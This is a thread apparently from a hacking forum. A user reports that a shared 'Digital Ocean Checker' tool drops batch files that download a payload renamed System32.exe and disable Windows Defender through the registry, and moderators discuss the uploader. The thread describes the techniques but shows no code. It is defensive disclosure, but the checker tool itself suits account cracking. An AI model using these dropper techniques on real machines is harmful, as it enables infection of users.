[Scan Report & Debloated download]: Digital Ocean Checker by Redey (shared by Betski)

Thanks to @HailHydra, this woudn't have been revealed without him notifiying me about Betski's software posts

When loading the executable, it will unpack in a folder (%appdata%), here are the files extracted by the application


wof.bat is where the malware gets downloaded, via this command

av.bat tries to disable Windows Defender via the regedit

i haven't been able to decompile test.exe, however, it has a lot of detections on virustotal and browsing through it via MiTeC EXE Explorer shows a interactions with the "Downloads" folder

[To see links please register here]

The file that gets downloaded (Systemas.exe) can't be downloaded anymore, so i can't go further, however, the script renames it a System32.exe, which is a supicious file name


The thread was released 1 day after the edits on the application has been made (containing the malwares)



here's a download link with only the standalone application:

Files (1):

Hidden Content

You must

[To see links please register here]

or

[To see links please register here]

to view this content.

[To see links please register here]

[To see links please register here]

(06-07-2020, 03:27 PM)miso Wrote:

[To see links please register here]

here's a download link with only the standalone application:

Files (1):

Hidden Content

You must

[To see links please register here]

or

[To see links please register here]

to view this content.

[To see links please register here]

[To see links please register here]

Good work with extracting the standalone application.

As I've mentioned In the other thread, I've yet to come across a tool of this nature that requires Installation.

(06-07-2020, 04:28 PM)mothered Wrote:

[To see links please register here]

(06-07-2020, 03:27 PM)miso Wrote:

[To see links please register here]

here's a download link with only the standalone application:

Files (1):

Hidden Content

You must

[To see links please register here]

or

[To see links please register here]

to view this content.

[To see links please register here]

[To see links please register here]

Good work with extracting the standalone application.

As I've mentioned In the other thread, I've yet to come across a tool of this nature that requires Installation.

he also shared viruses with the application (?) why don't you do anything about it?

(06-07-2020, 04:40 PM)miso Wrote:

[To see links please register here]

he also shared viruses with the application (?) why don't you do anything about it?

It may well be without his knowledge that the file Is Infected, whereby It's simply obtained from a given source on the assumption that It's clean.

Prior to making a decision, I'll allow him the opportunity to reply In his defense.